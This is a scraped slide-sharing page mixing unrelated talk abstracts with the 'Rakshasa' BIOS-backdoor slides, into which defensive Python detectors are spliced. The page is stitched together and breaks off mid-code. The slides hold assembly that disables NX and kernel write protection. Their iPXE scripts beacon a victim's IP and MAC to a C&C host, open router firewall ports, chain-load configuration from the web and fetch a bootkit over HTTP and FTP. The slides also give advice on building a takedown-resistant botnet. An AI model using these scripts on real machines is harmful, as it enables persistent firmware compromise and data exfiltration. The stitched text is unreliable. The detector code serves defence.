This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the Intel architecture, Rakshasa, capable of infecting more than a hundred different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in a permanent lowering of the security of the backdoored computer, even after complete erasing of the hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subversions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. Moreover, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demoing its capabilities. It is hoped to raise awareness in the security community regarding the dangers associated with the non open source firmware shipped with any computer and to question its integrity. This should also result in upgrading the best practices for forensics and post intrusion analysis by including the aforementioned firmware in their scope of work.
PostgreSQL is a very popular and feature-rich DBMS. At the same time, PostgreSQL has a set of annoying wicked problems, which haven't been resolved in decades. Miraculously, with just a small patch to PostgreSQL core extending this API, it appears possible to solve wicked PostgreSQL problems in a new engine made within an extension.
eBPF (extended Berkeley Packet Filters) is a modern kernel technology that can be used to introduce dynamic tracing into a system that wasn't prepared or instrumented in any way. The tracing programs run in the kernel, are guaranteed to never crash or hang your system, and can probe every module and function -- from the kernel to user-space frameworks such as Node and Ruby.
In this workshop, you will experiment with Linux dynamic tracing first-hand. First, you will explore BCC, the BPF Compiler Collection, which is a set of tools and libraries for dynamic tracing. Many of your tracing needs will be answered by BCC, and you will experiment with memory leak analysis, generic function tracing, kernel tracepoints, static tracepoints in user-space programs, and the "baked" tools for file I/O, network, and CPU analysis. You'll be able to choose between working on a set of hands-on labs prepared by the instructors, or trying the tools out on your own test system.
Next, you will hack on some of the bleeding edge tools in the BCC toolkit, and build a couple of simple tools of your own. You'll be able to pick from a curated list of GitHub issues for the BCC project, a set of hands-on labs with known "school solutions", and an open-ended list of problems that need tools for effective analysis. At the end of this workshop, you will be equipped with a toolbox for diagnosing issues in the field, as well as a framework for building your own tools when the generic ones do not suffice.
Using the new extended Berkeley Packet Filter capabilities in Linux to improve the performance of auditing security relevant kernel events around network, file and process actions.
DTrace and SystemTap are dynamic tracing frameworks available for Solaris and Linux respectively. This session will give an overview of the static DTrace probes available in both Drizzle and MySQL and show numerous examples of scripts that utilize these probes. Mixing dynamic and static probes will also be discussed.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux for the Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that use BPF have been written in the past 12 months for performance analysis. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
Accelerated Linux Core Dump Analysis training public slides (Dmitry Vostokov)
The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
Moved to https://speakerdeck.com/ebiken/zebra-srv6-cli-on-linux-dataplane-enog-number-49
Introduction to SRv6, Linux SRv6 implementation and how to add SRv6 CLI to Zebra 2.0 Open Source Network Operation Stack.
Presented at ENOG (Echigo NOG) #49.
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk will explain the principles of eBPF and its concrete advantages for connecting and securing Cloud Native applications.
This talk will explain what eBPF is, why it is revolutionary in several fields, give examples of tools using eBPF and what they gain from it, and open up to the future of that technology.
Hardware backdooring is practical : slides (Moabi.com)
Docker Introduction, and what's new in 0.9 (Docker Palo Alto at RelateIQ, Jérôme Petazzoni)
Docker is the Open Source container engine. This is an introduction to Docker, what it is, how it works, and some material presenting the new features in versions 0.8 and 0.9.
This presentation introduces some common protocols used in electronics, and how to sniff/speak them. Then a bit about USB, and some interesting hacks with these things.
Then a bit about openwrt and router hacking.
About the author: Priya Autee is a software engineer at Intel working on various leading edge IA features and an Intel(R) RDT expert. She is focused on prototyping and researching open source APIs like DPDK, Intel(R) RDT etc. to support NFV/compute sensitive requirements on Intel Architecture. She holds a Master's in Computer Science from Arizona State University, Arizona.
Let Me Pick Your Brain - Remote Forensics in Hardened Environments (Nicolas Collery)
Full Disk Encryption (FDE) may be rather useful as a defense mechanism against potential theft of a computer system. Usually such protection comes with some level of hardening, like removing administrative rights. However, when the system is compromised and requires careful forensic analysis, FDE and hardening can be quite painful for forensic analysts. This presentation, delivered at IIC-SG-2018 (Infosec In the City - Singapore) and at Div0 (Division0 local security meetup), highlights a few techniques to let a remote analyst perform investigations.
https://www.infosec-city.com
https://www.meetup.com/div-zero/
The Raspberry Pi is an inexpensive ($35), credit card sized computer that is able to run the Linux operating system. The card also contains USB ports, an Ethernet port, camera port, GPIO lines, serial ports, SPI port, HDMI port, and I2C port – just about anything you would want for an inexpensive and very powerful robot controller! Lloyd Moore will show us how to get started with this device. Specifically we'll talk about loading and configuring the operating system, installing the Qt (C++) development system, and controlling some of the ports.
This talk was held by Oleksandr Shevchenko (Senior Engineering Consultant, GlobalLogic) at GlobalLogic Lviv Embedded TechTalk #2 on May 23, 2018.
Oleksandr's presentation is about the features of a software architecture that provides parallel operation of Linux and a real-time operating system on different cores of a single processor. The talk also covers the Linux mechanism that allows processor cores to be connected after the boot process has finished, the so-called "CPU Hotplug".
[Defcon24] Introduction to the Witchcraft Compiler Collection (Moabi.com)
With this presentation, we take a new approach to reverse engineering. Instead of attempting to decompile code, we seek to undo the work of the linker and produce relocatable files, the typical output of a compiler. The main benefit of the latter technique over the former being that it does work. Once we have achieved universal code 'reuse' by relinking those relocatable objects as arbitrary shared libraries, we'll create a form of binary reflection, add scripting capabilities and in-memory debugging using a JIT compiler, to attain automated API prototyping and annotation, which, we will argue, constitutes a primary form of binary code self awareness. Finally, we'll see how abusing the dynamic linker internals shall elegantly solve a number of complex tasks for us, such as calling a given function within a binary without having to craft a valid input to reach it.
The applications in terms of vulnerability exploitation, functional testing, static analysis validation and more generally computer wizardry being tremendous, we'll have fun demoing some new exploits in real life applications, and commit public program profanity, such as turning PEs into ELFs, functional scripting of sshd in memory, stealing crypto routines without even disassembling them, among other things that were never supposed to work. All the above techniques have been implemented into the Witchcraft Compiler Collection, to be released as proper open source software (MIT/BSD-2 licenses) exclusively at DEF CON 24.
Jonathan Brossard is a computer whisperer from France, although he's been living in Brazil, India, Australia and now lives in San Francisco. For his first conference at DEF CON 16, he hacked Microsoft Bitlocker, McAfee Endpoint and a fair number of BIOS firmwares. During his second presentation at DEF CON 20, he presented Rakshasa, a BIOS malware based on open source software, which the MIT Technology Review labeled "incurable and undetectable".
This year will be his third DEF CON ... Endrazine is also known in the community for having run the Hackito Ergo Sum and NoSuchCon conferences in France, participating in the Shakacon Program Committee in Hawaii, and authoring a number of exploits over the past decade, including the first remote Windows 10 exploit and several hardcore reverse engineering tools and whitepapers. Jonathan is part of the team behind MOABI.COM, and acts as the Principal Engineer of Product Security at Salesforce.
Twitter: @endrazine
Facebook: toucansystem
https://moabi.com
[Blackhat2015] SMB : SHARING MORE THAN JUST YOUR FILES... (Moabi.com)
Powerpoint of our presentation at Blackhat 2015.
Featuring the first attacks against Windows 10 and Microsoft Edge.
- French Kiss attack against Windows 10.
- Syphilis attack against Microsoft Edge.
- Ménage à trois attack against Windows 10 and Exchange.
- Démos on Amazon AWS and Microsoft Azure.
[Ruxcon Monthly Sydney 2011] Proprietary Protocols Reverse Engineering : Rese... (Moabi.com)
This presentation given in 2011 during the first Ruxcon Monthly (Ruxmon) Sydney focuses on proprietary protocols reverse engineering and vulnerability audits.
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the... (Moabi.com)
Pre-boot authentication software, in particular full hard disk encryption software, plays a key role in preventing information theft. In this paper, we present a new class of vulnerability affecting multiple high value pre-boot authentication software products, including the latest Microsoft disk encryption technology : Microsoft Vista's Bitlocker, with TPM chip enabled. Because pre-boot authentication software programmers commonly make wrong assumptions about the inner workings of the BIOS interrupts responsible for handling keyboard input, they typically use the BIOS API without flushing or initializing the BIOS internal keyboard buffer. Therefore, any user input, including plain text passwords, remains in memory at a given physical location. In this article, we first present a detailed analysis of this new class of vulnerability and generic exploits for Windows and Unix platforms under x86 architectures. Unlike current academic research aiming at extracting information from the RAM, our practical methodology does not require any physical access to the computer to extract plain text passwords from the physical memory. In a second part, we will present how this information leakage, combined with usage of the BIOS API without careful initialization of the BIOS keyboard buffer, can lead to computer reboot without console access and full security bypass of the pre-boot authentication pin if an attacker has enough privileges to modify the bootloader. Other related work includes information leakage from CPU caches, reading physical memory thanks to FireWire, and switching CPU modes.
Key Trends Shaping the Future of Infrastructure (Cheryl Hung)
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
PHP Frameworks: I want to break free (IPC Berlin 2024) (Ralf Eggert)
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
"Impact of front-end architecture on development cost", Viktor Turskyi (Fwdays)
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
With each of the past 3 Ruby releases, YJIT has delivered higher and higher performance. However, we are seeing diminishing returns, because as JIT-compiled code becomes faster, it makes up less and less of the total execution time, which is now becoming dominated by C function calls. As such, it may appear like there is a fundamental limit to Ruby’s performance.
In the first half of the 20th century, some early airplane designers thought that the speed of sound was a fundamental limit on the speed reachable by airplanes, thus coining the term “sound barrier”. This limit was eventually overcome, as it became understood that airflow behaves differently at supersonic speeds.
In order to break the Ruby performance barrier, it will be necessary to reduce the dependency on C extensions, and start writing more gems in pure Ruby code. In this talk, I want to look at this problem more in depth, and explore how YJIT can help enable writing pure-Ruby software that delivers high performance levels.
2. DISCLAIMER
We are not « terrorists ». We won't release our PoC backdoor.
The x86 architecture is plagued by legacy.
Governments know. The rest of the industry : not so much.
There is a need to discuss the problems in order to find solutions...
This is believed to be orders of magnitude better than existing backdoors/malware.
3. Agenda
Motivation : state level backdooring ?
Coreboot & x86 architecture
State of the art in rootkitting, romkitting
Introducing Rakshasa
Rakshasa design
Why cryptography (Truecrypt/Bitlocker/TPM) won't save us...
Backdooring like a nation state
4. Who am I ?
- Security researcher, pentester
- First learned asm (~15 years ago)
- Presented at Blackhat/Defcon/CCC/HITB...
- Master in Engineering, master in Computer Sciences
- Co organiser of the Hackito Ergo Sum conference (Paris)
Likes: Unix, network, architecture, low level, finding 0days (memory corruptions).
Dislikes: web apps, canned exploits.
- Super pure English accent (French, learned English in India, lives in Australia... ;))
17. Rakshasa : Design (1/2)
Core components:
- Coreboot
- SeaBIOS
- iPXE
- payloads
Built on top of free software: portability, non-attribution, cheap development (~4 weeks of work), really really really hard to detect as malicious.
Supports 230 motherboards.
18. Rakshasa : Design (2/2)
Flash the BIOS (Coreboot + PCI ROMs such as iPXE)
Flash the network card or any other PCI device (redundancy)
Boot a payload over the network (bootkit over https)
→ Boot a payload over wifi/wimax (breach the network perimeter, bypass network detection, IPS/IDS)
→ Remotely reflash the BIOS/network card if necessary
21. Rakshasa : embedded features
Remove NX bit → executable heap/stack.
Make every mapping +W in ring0
Remove CPU updates (microcode)
Remove anti-SMM protections → generic local root exploit
Disable ASLR
Bootkitting (modified Kon-boot payload*)
* Thanks to Piotr Bania for his contribution to Rakshasa :)
22. Rakshasa : removing the NX bit (1/2)
MSR: Model Specific Register.
AMD64 Architecture Programmer's Manual (volume 2, Section 3.1.7: Extended Feature Enable Register):
"No-Execute Enable (NXE) Bit. Bit 11, read/write. Setting this bit to 1 enables the no-execute page-protection feature. The feature is disabled when this bit is cleared to 0."
23. Rakshasa : removing the NX bit (2/2)
; Disable NX bit (if supported)
mov eax,0x80000000 ; get higher function supported by eax
cpuid ; need amd K6 or better (anything >= 1997... should be ok)
cmp eax,0x80000001
jb not_supported ; need at least function 0x80000001
mov eax,0x80000001 ; get Processor Info and Feature Bits
cpuid
bt edx,20 ; NX bit is supported ?
jnc not_supported
mov ecx, 0xc0000080 ; extended feature register (EFER)
rdmsr ; read MSR
btr eax, 11 ; disable NX (EFER_NX) // btr = bit test and reset
wrmsr ; write MSR
not_supported:
24. Make every mapping +W in ring0
Intel Manuals (Volume 3A, Section 2.5):
"Write Protect (bit 16 of CR0) - When set, inhibits supervisor-level procedures from writing into read-only pages; when clear, allows supervisor-level procedures to write into read-only pages (regardless of the U/S bit setting; see Section 4.1.3 and Section 4.6). This flag facilitates implementation of the copy-on-write method of creating a new process (forking) used by operating systems such as UNIX."
25. Make every mapping +W in ring0 (32b/64b)
; 32b version :
mov eax,cr0
and eax,0xfffeffff
mov cr0,eax
; 64b version :
mov rax,cr0
and rax,0xfffeffff
mov cr0,rax
27. Remove anti-SMM protections (1/2)
Intel® 82845G/82845GL/82845GV Graphics and Memory Controller datasheet, Section 3.5.1.22: SMRAM—System Management RAM Control Register (Device 0), bit 4:
"SMM Space Locked (D_LCK)—R/W, L. When D_LCK is set to 1, D_OPEN is reset to 0; D_LCK, D_OPEN, C_BASE_SEG, H_SMRAM_EN, TSEG_SZ and TSEG_EN become read only. D_LCK can be set to 1 via a normal configuration space write but can only be cleared by a Full Reset. The combination of D_LCK and D_OPEN provide convenience with security. The BIOS can use the D_OPEN function to initialize SMM space and then use D_LCK to “lock down” SMM space in the future so that no application software (or BIOS itself) can violate the integrity of SMM space, even if the program has knowledge of the D_OPEN function."
28. Remove anti-SMM protections (2/2)
D_LCK is not supported by Coreboot currently anyway, so there is nothing to undo: the "disable D_LCK" shellcode for Coreboot reduces to a single instruction.
; disable D_LCK shellcode for Coreboot...
nop
29. Disable ASLR
- OS dependent.
- The seed for full ASLR has to live in kernel land (the equivalent of execve()).
→ patch the seed with a known value
- Seed location for Windows 7 identified by Kumar & Kumar (HITB KL 2010).
→ Mapping is 100% repeatable :)
30. Rakshasa : embedded features : conclusion
→ Permanent lowering of the security level on any OS.
→ Welcome back to the security level of 1997.
→ Persistent, even if the HD or OS is removed/restored.
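A defender's counterpart to slides 22-25, added here as an example (it is not code from the slides or from Rakshasa): given the register values the slides name, decide whether NX has been switched off below the OS. Two facts a practitioner needs in mind, neither stated on the slides: a kernel that sees CPUID.80000001H:EDX[20] set normally sets EFER.NXE itself during early boot, so a firmware-time clear of EFER.NXE alone is undone at the next boot; and on Intel parts the firmware can instead hide the feature from CPUID with the XD Bit Disable bit (bit 34 of IA32_MISC_ENABLE, MSR 0x1A0). The checker therefore looks at all three: what CPUID advertises (via the kernel's `nx` flag), EFER.NXE, and IA32_MISC_ENABLE. The /proc/cpuinfo text and the register values used when no MSR access is available are constructed; the live path needs root and the Linux `msr` module. CR0.WP (slides 24-25) is not reachable from user space and is left out.

```python
"""Check whether NX has been disabled or hidden below the OS (added example)."""
import os
import re

MSR_EFER = 0xC0000080
MSR_IA32_MISC_ENABLE = 0x1A0
EFER_NXE = 1 << 11            # AMD64 APM vol.2, 3.1.7: No-Execute Enable
MISC_XD_DISABLE = 1 << 34     # Intel IA32_MISC_ENABLE: XD Bit Disable
CPUID_EXT_EDX_NX = 1 << 20    # CPUID.80000001H:EDX[20]


def cpuid_reports_nx(ext_edx: int) -> bool:
    """True if CPUID.80000001H:EDX advertises the NX page bit."""
    return bool(ext_edx & CPUID_EXT_EDX_NX)


def efer_nx_enabled(efer: int) -> bool:
    """True if EFER.NXE is set, i.e. NX page protection is actually enforced."""
    return bool(efer & EFER_NXE)


def xd_hidden_by_firmware(misc_enable: int) -> bool:
    """True if IA32_MISC_ENABLE.XD_DISABLE is set (CPUID then hides NX)."""
    return bool(misc_enable & MISC_XD_DISABLE)


def cpuinfo_has_flag(cpuinfo_text: str, flag: str) -> bool:
    """Parse /proc/cpuinfo-style text and test the first 'flags' line."""
    m = re.search(r"^flags\s*:\s*(.*)$", cpuinfo_text, re.MULTILINE)
    return bool(m) and flag in m.group(1).split()


def assess(x86_64: bool, cpuinfo_text: str, efer: int, misc_enable: int) -> list:
    """Return a list of findings; an empty list means NX looks intact."""
    findings = []
    has_nx = cpuinfo_has_flag(cpuinfo_text, "nx")
    if x86_64 and not has_nx:
        # every x86-64 CPU implements NX; if the kernel cannot see it, something hid it
        findings.append("x86-64 CPU without 'nx' flag: NX hidden from CPUID (firmware?)")
    if xd_hidden_by_firmware(misc_enable):
        findings.append("IA32_MISC_ENABLE.XD_DISABLE set: firmware disabled NX reporting")
    if has_nx and not efer_nx_enabled(efer):
        findings.append("CPU reports NX but EFER.NXE is clear: NX not enforced")
    return findings


def read_msr(index: int, cpu: int = 0) -> int:
    """Live MSR read through the Linux msr driver (root + 'modprobe msr')."""
    fd = os.open(f"/dev/cpu/{cpu}/msr", os.O_RDONLY)
    try:
        return int.from_bytes(os.pread(fd, 8, index), "little")
    finally:
        os.close(fd)


# Constructed sample: a 64-bit Intel box whose kernel still sees the nx flag.
SAMPLE_CPUINFO = """processor\t: 0
vendor_id\t: GenuineIntel
flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx lm
"""

if __name__ == "__main__":
    try:
        efer = read_msr(MSR_EFER)
        misc = read_msr(MSR_IA32_MISC_ENABLE)   # fails with EIO on non-Intel CPUs
        with open("/proc/cpuinfo") as f:
            cpuinfo = f.read()
    except OSError:
        # No MSR access: fall back to constructed values modelling EFER.NXE cleared.
        efer, misc, cpuinfo = 0x501, 0, SAMPLE_CPUINFO
    for finding in assess(os.uname().machine == "x86_64", cpuinfo, efer, misc):
        print("FINDING:", finding)
```

Run it as root with the `msr` module loaded to check a live machine; without MSR access it falls back to the constructed values and reports the EFER.NXE-cleared case.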
31. Rakshasa : remote payload
Currently capable of bootkitting any version of Windows (32b/64b) thanks to a special version of Kon-boot.
Bootkit future OSes? → Update/remove/reflash firmwares (PCI, BIOS)
32. Rakshasa : stealth
We don't touch the disk. 0 evidence on the filesystem.
The code flashed to the motherboard is not hostile per se (there is one text file with URLs in it... that's it).
We can remotely boot from an alternate payload or even OS: fake Truecrypt/Bitlocker prompt!
Optionally boot from a Wi-Fi/WiMAX stack: 0 network evidence on the LAN.
Fake BIOS menus if necessary. We use an embedded CMOS image. We can use the real CMOS NVRAM to store encryption keys/backdoor state between reboots.
33. Rakshasa : why using Coreboot/SeaBIOS/iPXE is the good approach
Portability: benefit from all the gory reverse engineering work already done!
Awesome modularity: embed existing payloads (as floppy or cdrom images) and PCI ROMs directly in the main Coreboot ROM!
Eg: bruteforce bootloaders (Brossard, H2HC 2010), bootkits without modification.
Network stacks: ip/udp/tcp, dns, http(s), tftp, ftp... make your own (tcp over dns? over ntp?)
Code is legit: can't be flagged as malware!
34. Example iPXE configuration files: get an IP
#!ipxe
# try dhcp first, else use static IP
dhcp || ( set net0/ip 192.168.0.3 && set net0/netmask 255.255.255.0 && set net0/gateway 192.168.0.1 )
35. Example iPXE configuration files: fun with webapps...
# evil pingback to C&C internet blog with HTTP auth...
kernel http://admin:p4ssw0rd@2012.hackitoergosum.org/xmlrpc.php?ip=${net0/ip}&mac=${net0/mac}&netmask=${net0/netmask}&gateway=${net0/gateway}&dns=${net0/dns}&domain=${net0/domain} ||
# Send an email using an open relay web application
kernel http://vulnerablehost.com/vulnservice.asp?mail-from=Rakshasa&mail-toaddress=endrazine%40gmail.com&mail-subject=BIOS%20Owned ||
# Router pharming: modify firewall settings
kernel http://admin:password@2012.hackitoergosum.org/cgi-bin/firewall?action=enable&port=all ||
kernel http://root:root@2012.hackitoergosum.org/cgi-bin/firewall?enableport=all ||
36. Example iPXE configuration files: chain configuration loader from the web
# chain loader over https
chain https://www.pmcma.org/ads/love.jpg?ip=${net0/ip}&mac=${net0/mac} ||
37. Example iPXE configuration files: boot an alternate OS/bootkit
# discard everything done so far
imgfree
# fetch memdisk kernel over the internet via ftp
kernel ftp://ftp.pmcma.org/pwnage/memdisk.pdf ||
# fetch bootkit payload over the internet via http
initrd http://www.pmcma.org/wp-content/uploads/2012/07/bootkit.pdf ||
# boot
boot
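The scripts on slides 34-37 leave one trace the slides do not dwell on: every `kernel`, `chain` and `initrd` line is an HTTP request, sent by iPXE with its own User-Agent (`iPXE/<version>`, real iPXE behaviour) and, in these scripts, with `${net0/ip}`, `${net0/mac}` and the other net0 settings in the query string. The detector below, an added example rather than anything from the slides, runs that logic over web server or proxy logs in Apache "combined" format and flags lines that match either signal, pulling the client's MAC (and its OUI prefix) out of the query so an analyst can find the box. The log lines are constructed for the example; a malicious bootloader could of course change the User-Agent, which is why the query-string heuristic is kept independent of it.

```python
"""Flag iPXE-style HTTP beacons in 'combined' web logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format: src ident user [ts] "req" status size "ref" "ua"
COMBINED = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Query keys that the slides' scripts fill in from iPXE's net0 settings.
BEACON_KEYS = {"ip", "mac", "netmask", "gateway", "dns", "domain"}
MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$", re.I)


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def beacon_params(url: str) -> dict:
    """Extract the net0-derived query parameters from a request URL."""
    qs = parse_qs(urlsplit(url).query)
    return {k: v[0] for k, v in qs.items() if k in BEACON_KEYS}


def classify(line: str):
    """Return (reasons, details) for a suspected firmware beacon, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    params = beacon_params(rec["url"])
    reasons = []
    if rec["ua"].startswith("iPXE/"):
        reasons.append("ipxe-user-agent")
    if "mac" in params and MAC_RE.match(params["mac"]):
        reasons.append("mac-in-query")
    if len(params) >= 3:
        reasons.append("net0-settings-in-query")
    if not reasons:
        return None
    details = {"src": rec["src"], "url": rec["url"], **params}
    if "mac" in params:
        details["oui"] = params["mac"][:8].upper()   # vendor prefix, see slide 59
    return "+".join(reasons), details


def scan(lines):
    """Run classify() over an iterable of log lines; return [(line_no, hit), ...]."""
    hits = []
    for number, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            hits.append((number, hit))
    return hits


# Constructed sample log: two beacons modelled on slides 35 and 36, one normal hit.
SAMPLE_LOG = [
    '10.0.0.23 - - [20/Jul/2012:10:12:01 +0200] "GET /xmlrpc.php?ip=10.0.0.23&mac=00:1b:21:3a:4f:10'
    '&netmask=255.255.255.0&gateway=10.0.0.1 HTTP/1.1" 200 512 "-" "iPXE/1.0.0+"',
    '10.0.0.50 - - [20/Jul/2012:10:12:07 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.77 - - [20/Jul/2012:10:13:44 +0200] "GET /ads/love.jpg?ip=10.0.0.77&mac=00:1b:21:aa:bb:cc'
    ' HTTP/1.1" 200 90112 "-" "iPXE/1.0.0+ (9d7e)"',
]

if __name__ == "__main__":
    for number, (reasons, details) in scan(SAMPLE_LOG):
        print(f"line {number}: {reasons} {details}")
```

Feed it real logs with `scan(open("access.log"))`; the `oui` field is what the C&C side of slide 59 uses to pick a vendor flasher, and it serves the defender equally well for asset lookup.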
38. DEMO : Evil remote carnal pwnage (of death)
I can write blogs too... Muhahahaha...
41. How to properly build a botnet?
HTTPS + asymmetric cryptography (client side certificates, signed updates).
If Microsoft can do secure remote updates, so can a malware!
Avoid DNS takeovers by law enforcement agencies by rotating the C&C across innocent web sites (are you gonna shut down Google.com?), and use asymmetric crypto to push updates.
So you own my C&C for 1 hour? You can't do anything with it!!
→ C&C CAN'T BE SHUT DOWN OR TAKEN OVER.
43. Why crypto won't save you (1/2)
We can fake the boot-time password prompt (Truecrypt/Bitlocker) by booting a remote OS.
Once we know the password, the BIOS backdoor can emulate keyboard typing in 16b real mode by programming the keyboard/motherboard PIC microcontrollers (Brossard, Defcon 2008).
If necessary, patch back the original BIOS/firmwares remotely.
44. Why crypto won't save you (2/2)
TPM + full disk encryption won't save you either:
1) It's a passive chip: if the backdoor doesn't want explicit access to data on the HD, it can simply ignore the TPM.
2) Your HD is never encrypted when delivered to you. You seal the TPM only when you encrypt your HD. So the TPM doesn't prevent backdooring by anyone in the supply chain.
45. How about AVs??
Putting an AV on a server to protect against unknown threats is purely cosmetic.
You may as well put lipstick on your servers...
54. Remediation (leads)
Flash any firmware upon reception of new hardware with open source software you can verify.
Perform checksums of all firmwares by physically extracting them (FPGA...): costly!
Verify the integrity of all firmwares from time to time.
Update forensics best practices:
1) Include firmwares in the scope of work (SoW)
2) Throw away your computer in case of intrusion
Even then... not entirely satisfying: the backdoor can flash the original firmwares back remotely.
55. Post intrusion recovery
- You can't trust your BIOS
→ you can't flash from the OS or even floppy/cdrom.
→ need a physical flasher.
- Rakshasa can reinfect itself from any PCI expansion ROM.
→ you need to flash all the firmwares of the motherboard at the same time.
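Slides 54-55 ask for checksums of physically extracted firmware and for the firmware to be in scope of forensic work. What that looks like in practice, as an added example that is not from the slides or from Rakshasa: hash a dumped image against a baseline taken when the machine was received, and inventory it. Since Rakshasa is a Coreboot ROM, the inventory walks CBFS, Coreboot's flash filesystem, whose file headers start with the 8-byte magic `LARCHIVE` followed by big-endian `len`, `type`, `attributes_offset` and `offset`, then the NUL-terminated name (layout as in coreboot's `cbfs.h`; the type numbers used are the ones from that header). Option ROMs and anything named after iPXE/gPXE are flagged. The image below is constructed, not a real dump; an attacker can strip CBFS headers or hide the flash from software readers, which is exactly why the baseline comparison over a hardware-extracted dump is the primary check and the inventory only a convenience.

```python
"""Hash a BIOS dump against a baseline and inventory its CBFS contents (added example)."""
import hashlib
import struct

CBFS_MAGIC = b"LARCHIVE"
CBFS_HDR = struct.Struct(">8sIIII")   # magic, len, type, attributes_offset, offset
CBFS_TYPES = {0x10: "stage", 0x20: "payload", 0x30: "optionrom", 0x50: "raw"}  # cbfs.h
ALIGN = 64                            # default CBFS file alignment


def cbfs_files(image: bytes, align: int = ALIGN):
    """Yield (name, type, data_len) for every CBFS file header found in image."""
    pos = 0
    while pos + CBFS_HDR.size <= len(image):
        if image[pos:pos + 8] != CBFS_MAGIC:
            pos += align
            continue
        _, length, ftype, _attr, offset = CBFS_HDR.unpack_from(image, pos)
        name_end = image.index(b"\0", pos + CBFS_HDR.size)
        name = image[pos + CBFS_HDR.size:name_end].decode("ascii", "replace")
        yield name, ftype, length
        # the next header follows the file data, rounded up to the alignment;
        # never stand still on a corrupt header with offset == len == 0
        pos = max(pos + offset + length, pos + CBFS_HDR.size)
        pos = (pos + align - 1) // align * align


def suspicious(entries):
    """Components a stock vendor BIOS would not carry in CBFS form."""
    hits = []
    for name, ftype, length in entries:
        kind = CBFS_TYPES.get(ftype, hex(ftype))
        lname = name.lower()
        if kind == "optionrom" or "ipxe" in lname or "gpxe" in lname:
            hits.append((name, kind, length))
    return hits


def sha256(image: bytes) -> str:
    return hashlib.sha256(image).hexdigest()


def verify(image: bytes, baseline_sha256: str) -> dict:
    """Compare a freshly extracted image with the baseline taken at delivery."""
    digest = sha256(image)
    files = list(cbfs_files(image))
    return {"sha256": digest, "matches_baseline": digest == baseline_sha256,
            "files": files, "suspicious": suspicious(files)}


def make_file(name: str, ftype: int, data: bytes, align: int = ALIGN) -> bytes:
    """Build one CBFS entry; used only to construct the sample image below."""
    hdr_len = CBFS_HDR.size + len(name) + 1
    offset = (hdr_len + 15) // 16 * 16          # data start padded to 16 bytes
    entry = CBFS_HDR.pack(CBFS_MAGIC, len(data), ftype, 0, offset)
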